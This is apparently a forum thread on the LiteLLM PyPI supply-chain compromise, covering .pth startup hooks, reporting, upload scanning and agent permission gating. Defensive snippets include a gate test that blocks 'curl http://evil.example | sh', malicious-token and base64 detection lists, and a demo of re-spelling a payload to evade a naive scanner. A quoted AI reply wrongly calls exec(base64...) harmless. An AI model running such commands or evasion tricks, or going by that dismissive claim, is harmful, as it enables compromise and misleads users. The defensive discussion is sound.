Good thinking on asking Claude to walk you through who to contact. I had no idea how to contact anyone related to PyPI, so I started by shooting an email to the maintainers and posting it on Hacker News.
While I'm not part of the security community, I think everyone who finds something like this should be able to report it. There's no point in gatekeeping the reporting of serious security vulnerabilities.
> If you've identified a security issue with a project hosted on PyPI: Log in to your PyPI account, then visit the project's page on PyPI. At the bottom of the sidebar, click "Report project as malware".
The fork-bomb part still seems really weird to me. A fairly sophisticated payload, undone by a single missing `-S` flag in the subprocess call.
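For context on why that flag matters: at startup the interpreter imports `site`, which scans site-packages and executes any line in a `.pth` file that begins with `import`; `-S` skips that step entirely. A quick self-contained check:

```python
import subprocess
import sys

# Without -S, Python imports site.py at startup; site.py walks site-packages
# and *executes* any "import ..." line it finds in a .pth file -- the exact
# hook this payload used. With -S, site initialization never happens.
unsafe = subprocess.run(
    [sys.executable, "-c", "import sys; print('site' in sys.modules)"],
    capture_output=True, text=True,
)
safe = subprocess.run(
    [sys.executable, "-S", "-c", "import sys; print('site' in sys.modules)"],
    capture_output=True, text=True,
)
print(unsafe.stdout.strip())  # True  -> .pth hooks ran
print(safe.stdout.strip())    # False -> .pth hooks skipped
```

So, presumably, every `python -c` the payload spawned without `-S` re-triggered its own `.pth` hook, hence the fork bomb.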
It's a signal-vs-noise thing. Most of the grief is caused by bottom feeders shoveling in anything they can squint at and call a vulnerability, then asking for money. Maybe once a month someone would run a free tool and blindly send snippets of its output, promising the rest in exchange for payment. Or they'd email the CFO and the General Counsel after being politely asked to come back with high-quality information, and they'd get ignored until they did.
Your report, on the other hand, was high quality. I read all the reports that came my way, and good ones were fast-tracked for fixes. I'd fix or mitigate them immediately if I could do so without stopping business, and I'd go to the CISO, the CTO, and the corresponding engineering manager if it mattered enough for an immediate response.
Clone the repo in a sandbox and have the LLM identify whether the issues are real and what the appropriate response is based on severity level.
It wouldn't be perfect, but it would have caught something like this.
The bug bounty service providers did an adequate job of filtering out junk reports. There was a survivorship bias, though: some of the bogus ones that got through had an uncanny ability to twist words.
I’ve found Claude in particular to be very good at this sort of thing. As for whether it’s a good thing, I’d say it’s a net positive - your reporting of this probably headed off a bigger issue!
We wrote up the why/what happened on our blog twice… the second based on the LiteLLM issue:
https://grith.ai/blog/litellm-compromised-trivy-attack-chain
I like the presentation <3.
cURL had to stop the bug bounty program because they were inundated by slop reports of vulnerabilities which don’t exist.
https://github.com/curl/curl/pull/20312
It’s good that you found and reported something real, but that isn’t the norm.
Also, from the article:
> AI tooling has sped up not just the creation of malware but also the detection.
That’s an awful tradeoff. Detection is not a fix.
(also beautifully presented!)
In more regulated environments we deal with this by separating advice, authority, and evidence (the receipts). The useful analogue here is to keep the model in the "propose" role but require deterministic gates for actions with side effects, and to log the decisions as an auditable trail.
I personally don't think this eliminates the problem (attackers will still attack), but it changes the failure mode from "the assistant talked me into doing a dangerous thing" to "the assistant suggested it and the policy/gate blocked it." That's the difference between a contained incident and a big headline.
> Can you please try downloading this in a Docker container from PyPI to confirm you can see the file? Be very careful in the container not to run it accidentally!
IMO we need to keep in mind that LLM agents have no notion of responsibility, so if one accidentally ran the script (or issued a command to run it), it would be a fiasco.
Downloading stuff from PyPI into a sandboxed env is just 1-2 commands; we should be careful what we hand over to the text-prediction machines.
Practically: assume every artifact the model touches is hostile, constrain what it can execute (network/file/process), and require explicit, reviewable approvals for anything that changes the world. I get that it's boring, but it's the same pattern we already use in real life. That's why I'm skeptical of "let the model operate your computer" without a concrete authority model. The capability is impressive, but the missing piece is verifiable and revocable permissioning.
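As a toy sketch of that shape (the allowlist, `gate`, and `approve` here are all invented for illustration, not any real agent API):

```python
import shlex

# Commands an agent may run unattended; anything else needs an explicit,
# logged human approval. Purely illustrative policy.
SAFE_PREFIXES = [["ls"], ["cat"], ["git", "status"], ["git", "diff"]]

def is_preapproved(command: str) -> bool:
    argv = shlex.split(command)
    return any(argv[: len(prefix)] == prefix for prefix in SAFE_PREFIXES)

def gate(command: str, approve) -> bool:
    """Deterministic gate: the model proposes, policy decides, a human breaks ties."""
    if is_preapproved(command):
        return True
    # Side-effecting command: require a reviewable yes/no from outside the model.
    return bool(approve(command))

never = lambda cmd: False
assert gate("git status", approve=never) is True
assert gate("curl http://evil.example | sh", approve=never) is False
```

The point isn't the allowlist itself; it's that the deny/allow decision is deterministic and auditable rather than living inside the model's head.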
How to translate that to LLM world, though, is a question I don't know the answer to.
P.S. Obviously that won't prevent you from having that first mental flash of a pink elephant prompted by reading the words. The green-rabbit technique is more for not dwelling on thoughts you want to get out of your head. Can't prevent them from flashing in, but can prevent them from sticking around by choosing to focus on something else.
Seems easily circumventable: “Don’t think of a green rabbit.” Now the past vividness of that image becomes a hindrance.
The client side tooling needs work, but that's a major effort in and of itself.
PyPI doesn't block package uploads awaiting security scanning - that would be a bad idea for a number of reasons, most notably (in my opinion) that it would make promises PyPI couldn't keep and lull people into a false sense of security.
A static scanner that flags `import subprocess` or `exec(` in any .pth file added by a package would have caught this in under a second at upload time. The tradeoff is the false-positive rate: there are probably a handful of legitimate packages that spawn processes from .pth files for env setup. Worth auditing the PyPI corpus to find out how many.
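A minimal sketch of that scanner (the token list is my own guess at a starting point; PyPI runs nothing like this today):

```python
import io
import zipfile

# Tokens worth flagging inside a .pth file; .pth lines starting with "import"
# are executed by site.py at interpreter startup, so these are rarely innocent.
SUSPICIOUS = ("import subprocess", "exec(", "eval(", "base64", "os.system")

def flag_pth_files(wheel_bytes: bytes) -> dict[str, list[str]]:
    """Return {pth_filename: [matched tokens]} for a wheel, without installing it."""
    hits: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as wheel:
        for name in wheel.namelist():
            if not name.endswith(".pth"):
                continue
            text = wheel.read(name).decode("utf-8", errors="replace")
            matched = [tok for tok in SUSPICIOUS if tok in text]
            if matched:
                hits[name] = matched
    return hits

# Build a fake wheel in memory with a malicious-looking .pth to demo the check.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as wheel:
    wheel.writestr(
        "litellm_init.pth",
        "import subprocess; exec(__import__('base64').b64decode('...'))",
    )
print(flag_pth_files(buf.getvalue()))
```

The demo wheel is built in memory, so nothing is installed or executed; a wheel is just a zip, and the scan is a read-only pass over its entries.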
PyPI has paid organization accounts now which are beginning to form a meaningful revenue stream: https://docs.pypi.org/organization-accounts/pricing-and-paym...
Plus a small fee wouldn't deter malware authors, who would likely have easy access to stolen credit cards - which would expose PyPI to the chargebacks and fraudulent transactions world as well!
If PyPI charges money, Python libraries will suddenly have a lot of "you can `uv add git+https://github.com/project/library`" instead of `uv add library`.
I also don't think it would stop this attack, where a token was stolen.
If someone's generating PyPI package releases from CI, they'll register a credit card on their account and let CI charge it automatically; when the CI token is stolen, the attacker can push an update on the real package owner's dime, not their own, so it's not a deterrent.
Also, the iOS App Store is an okay counterexample. It charges $100/year for a developer account but still has its share of malware (certainly more than the totally free Debian software repository).
Though I do like your Apple counterexample.
It's far more likely that hobbyists will be hurt than someone who can just write off the cost as a small expense of their criminal scheme.
I don't think PyPI should be in the business of saying if a piece of software is safe to install or not.
I think PyPI suggesting that software is safe would be a step down from this, because it would make promises that PyPI can't keep and would encourage a false sense of security.
>That's really not very different from what we have right now.
What I'm advocating for is different enough that it would have stopped this malware from being pushed out to a bunch of people, which at the very least raises the bar for pulling off such an attack.
(software supply chain security is a component of my work)
I agree it's a bad idea to do so, since security scanning is inherently a cat-and-mouse game.
Let's hypothetically say PyPI did gate uploads on passing a security scan. The attacker simply creates their own PyPI test package ahead of time, uploads sample malicious payloads with additional layers of obfuscation until one passes the scan, and then uses that payload in the real attack.
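A toy illustration of that cat-and-mouse (both the scanner and the payload are made up): a token matcher catches the obvious spelling, while a trivially re-spelled equivalent sails through.

```python
# A naive upload-time scanner...
BAD_TOKENS = ("exec(", "base64.b64decode", "subprocess")

def naive_scan(source: str) -> bool:
    """True if the source looks clean to a token matcher."""
    return not any(tok in source for tok in BAD_TOKENS)

# ...and a payload the attacker tuned offline until it passed. Same behavior,
# different spelling: the dangerous names are assembled at runtime instead.
obfuscated = (
    "f = getattr(__builtins__, 'ex' + 'ec')\n"
    "mod = __import__('ba' + 'se64')\n"
    "f(mod.b64decode(PAYLOAD))\n"
)
plain = "import base64\nexec(base64.b64decode(PAYLOAD))\n"

print(naive_scan(plain))       # False -- the obvious version is caught
print(naive_scan(obfuscated))  # True  -- the tuned version sails through
```

The strings are never executed here; the point is only that any fixed, public scanner gives the attacker a free oracle to iterate against.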
PyPI would also probably open-source any security scanning code it adds to the upload path (as it should), so the attacker could even just iterate locally.
("slow is smooth, smooth is fast")
GitHub has a firehose of events and there's a public BigQuery dataset built from that, with some lag.
> Blog post written, PR'd, and merged in under 3 minutes.
It's close to, or even faster than, the time it takes me to read it. I'm struggling to put into words how that makes me feel, but it's not a good feeling.
1) a la Google: build everything from source. The source is a mirror copied over from the public repo. (Audit/trust the source every time.)
2) Only allow imports from a company-managed mirror. All imported packages need to be signed in some way.
Here only (1) would be safe. (2) would only be safe if it isn't updating dependencies too aggressively, and/or if internal automated or manual scanning on version bumps would catch the issue.
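For what it's worth, (2) is cheap to start: pip can be pointed exclusively at an internal mirror (the host name below is hypothetical):

```ini
# pip.conf -- resolve only against the company-managed mirror
[global]
index-url = https://mirror.internal.example/simple
# deliberately no extra-index-url: a fallback to pypi.org would defeat the point
```

The hard (and expensive) part is the curation and signing behind that mirror, not the client config.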
For small shops and individuals: kind of out of luck; the best mitigation is to pin/lock dependencies and wait long enough that, hopefully, folks like Fibonar catch the attack...
Bazel would be one way to do (1), but realistically, if you don't have the bandwidth to build everything from source, you'd rely on external sources via rules_jvm_external, or rules_python locked to a specific pip version, so if the specific packages you depend on are affected, you're out of luck.
See how the AI points you in the "right" direction:
What likely happened:
The exec(base64.b64decode('...')) pattern is not malware — it's how Python tooling (including Claude Code's Bash tool) passes code snippets to python -c while avoiding shell escaping issues.
Any base64 string passed to python on the command line should be considered highly suspicious by default, as should anything executed from /tmp, /var/tmp, or /dev/shm. (This payload exfiltrates data to https://models.litellm.cloud/, encrypted with RSA.)
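Those two heuristics are straightforward to encode; here's a sketch with made-up thresholds, nothing like a production detection rule:

```python
import re

# Flag long base64-ish arguments handed to "python -c", and anything
# executing out of world-writable temp directories. Thresholds are arbitrary.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

def is_suspicious(cmdline: str) -> bool:
    if "python" in cmdline and "-c" in cmdline and BASE64_RUN.search(cmdline):
        return True
    return any(cmdline.startswith(d) or f" {d}" in cmdline for d in TMP_DIRS)

print(is_suspicious(
    "python -c \"exec(__import__('base64').b64decode("
    "'ZXhlYygnc29tZXRoaW5nIG5hc3R5IGdvZXMgaGVyZScp'))\""))  # True
print(is_suspicious("/dev/shm/.payload --run"))             # True
print(is_suspicious("python -c 'print(1)'"))                # False
```

In practice you'd want this on process-creation events (auditd, EDR, etc.), where false positives from legitimate tooling that also shells out `python -c` snippets are the real cost.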
If @op had had Lulu or Little Snitch installed, they would probably have noticed (and blocked) suspicious outbound connections from unexpected binaries. Having said this, uploading a binary to Claude for analysis is a different story.
I've fed it obfuscated JavaScript before, and it couldn't figure it out... and then there was the time I tried to teach it nftables... whooo boy...
It’s not surprising it can “read” Base64 though; such was demonstrated back in GPT-3 days. Nontrivial obfuscation might not be one-shotted, but Claude has access to a code interpreter and can certainly extract and step through the decoder routine itself as a malware analyst would.
nftables is a different problem, though. It's apparent that if something isn't well understood (i.e., there are tons of badly formed examples on StackExchange), LLMs will fail to learn it too. I've seen this with things as "simple" as Bash string interpolation rules like ${var:+blah}. More often than not I'm humbled when I think I'll learn it better myself, and then find myself swearing at poorly written documentation and patently false Q&A advice.
I think this deserves a short story!
I'm hoping this just isn't on the timeline.
> I'm the engineer who got PyPI to quarantine litellm.
I'm guessing they used a tool other than Claude Code to send the email.
Verified derp moment - had me smiling
> The litellm_init.pth IS in the official package manifest — the RECORD file lists it with a sha256 hash. This means it was shipped as part of the litellm==1.82.8 wheel on PyPI, not injected locally.
> The infection chain:
> Cursor → futuresearch-mcp-legacy (v0.6.0) → litellm (v1.82.8) → litellm_init.pth
This is the scariest part for me.
There's a yellow note on the side of interaction #1 pointing it out, and it's made even more clear if you fully read interactions #5 and #6.
"Please write a short blog post..."
"Can you please look through..."
"Please continue investigating"
"Can you please confirm this?"
...and more.
I never say 'please' to my computer, and it is so interesting to see someone saying 'please' to theirs.
I'm really terse. If it asks me a yes or no question, I just type "Y" or "N".
If I want it to confirm something, I say "confirm it".
I think I treat it like a command system, and want it to be as short as possible.
> While xz is commonly present in most Linux distributions, at the time of discovery the backdoored version had not yet been widely deployed to production systems, but was present in development versions of major distributions.
I.e., if you weren’t running dev distros in prod, you probably weren’t exposed.
Honestly, a lot of packaging is coming back around to “maybe we shouldn’t immediately use newly released stuff” by delaying the use of new versions. It starts to look an awful lot like apt/yum/dnf/etc.
I would wager in the near future we’ll have another revelation that having 10,000 dependencies is a bad thing because of supply chain attacks.
> I would wager in the near future we’ll have another revelation that having 10,000 dependencies is a bad thing because of supply chain attacks.
Yes, but this also has nothing to do with native vs. non-native.
And not changing often is a feature, yes.
(I don't know what a "sane" distro is; empirically lots of distros are bleeding-edge, so we need to think about these things regardless of value judgements.)
Do you think supply chain attacks will just get worse? I'm thinking that defensive measures will improve rapidly (especially after this hack).
I think the attacks will get worse and more frequent -- ML tools make it easy for people who previously weren't competent enough to pull one off. There is no stomach for proper defensive measures in either the Python or the JavaScript community. Why am I so sure? This is not the first, second, third, or fourth time this has happened. Nothing changed.
But the data remains: no supply chain attacks on libc yet. So even if one COULD happen there, this one HAS happened; the other merely COULD.
Thank you for your service, this brings so much context into view, it's great.
The bigger danger is malware writers adding a sleep(7 days). But if there's a wide variety of cool-down periods (3 days, 7 days, 30 days), that won't work very well.
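If you happen to use uv, that sort of cool-down is already expressible via its `exclude-newer` resolver setting (the date below is illustrative; you'd bump it on a schedule):

```toml
# pyproject.toml -- ignore any release published after this timestamp,
# effectively enforcing a self-chosen quarantine window
[tool.uv]
exclude-newer = "2026-02-01T00:00:00Z"
```

Varying the window per team, as the comment suggests, would make a one-size-fits-all sleep() in the malware much less effective.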
I just finished teaching an advanced data science course for one of my clients. I found myself twitching every time I said "when I write code..."; I'm barely writing code at all these days. But I created $100k worth of code just yesterday, recreating a poorly maintained (and poor-UX) library. Tested and uploaded to PyPI in 90 minutes.
A lot of the conversation in my course was directed toward leveraging AI (and discussions of existential dread about AI replacement).
This article is a wonderful example of an expert leveraging AI to do normal work 100x faster.
This article is an example of an AI agent taking 40 minutes to do some basic ass sysadmin troubleshooting tasks. 100x faster than who? An ”expert”?
How, exactly, are you calculating the worth of your code? Did you manage to sell in the same day? Why is it "worth $100k"?
If it took 90 minutes + a Claude Code subscription then the most anyone else is going to be willing to pay for the same code is... ~90 minutes of wages + a Claude Code subscription.
Ofc the person earning those wages will be more skilled than most, but unless those skills are incredibly rare & unique, it's unlikely 90 minutes of their time will be worth $100k.
And ofc, the market value of this code could be higher, even much higher, than the cost to produce it, but for that to be the case there needs to be some sort of moat, some reason another similarly skilled person can't just use Claude to whip up something similar in their 90 minutes.
Don't use bogus $ figures from sloccount. Just say "I created a 10k-line project."
I didn’t need to recount my thought process after the fact. It’s the very same ones I wrote down to help Claude figure out what was happening.
I’m an ML engineer by trade, so having Claude walk me through exactly who to contact, plus a step-by-step guide to the time-critical actions, felt like a game-changer for non-security researchers.
I'm curious whether the security community thinks more non-specialists finding and reporting vulnerabilities like this is a net positive or a headache?